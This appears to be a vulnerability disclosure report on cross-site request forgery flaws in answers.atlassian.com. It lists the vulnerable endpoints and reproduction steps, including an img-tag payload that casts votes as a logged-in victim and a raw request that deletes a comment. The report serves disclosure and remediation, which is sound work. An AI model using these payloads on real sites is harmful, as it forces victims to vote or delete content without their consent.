Multiple CSRF vulnerabilities exist on answers.atlassian.com where an attacker can potentially perform actions such as the following, if the victim visits the attackers malicious resource:

Confirmed affected:

• Upvoting of answers
• Downvoting of answers
• Deletion of answers or comments
• Liking of comments
• Cancelling of bounties
• Marking as favourite

Unconfirmed however may be possible:

• Conversion of answers to comments via crafted form
• Setting and confirming a bounty

Steps to reproduce:

Issuing Arbritrary Likes/Upvotes/Downvotes

1. Find the comment or answer you wish to like/upvote/downvote.
2. To obtain its ID, search the HTML source for "/vote/" or inspect the comment element and find its ID. It should be in this format "/vote/[ID]/up/"
3. Once the ID is obtained simply place it in the following "img" tag accordingly: <img src="https://answers.atlassian.com/vote/[ID]/up/"/>
4. When placed into a HTML file and visited by the authenticated Atlassian Answers victim, regardless of which domain the HTML is hosted on, the comment will be upvoted.
5. To down vote, change "/up/" to "/down/" accordingly in the src value of the img tag.
6. In order to make the victim like a comment, change the img's src value to "/like_comment/[id]/" accordingly.

The following endpoints were identified to be vulnerable:

/vote/[id]/up/
/vote/[id]/down/
/bounty/[id]/cancel/
/like_comment/[id]/
/mark_favorite/[id]/
/delete_comment/[id]/
/delete/[id]/

The following HTTP request was able to successfully delete a comment made by me, without any prior verification or validation:

GET /delete_comment/299015/ HTTP/1.1
Host: answers.atlassian.com
Connection: keep-alive
Accept: image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
DNT: 1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: [redacted]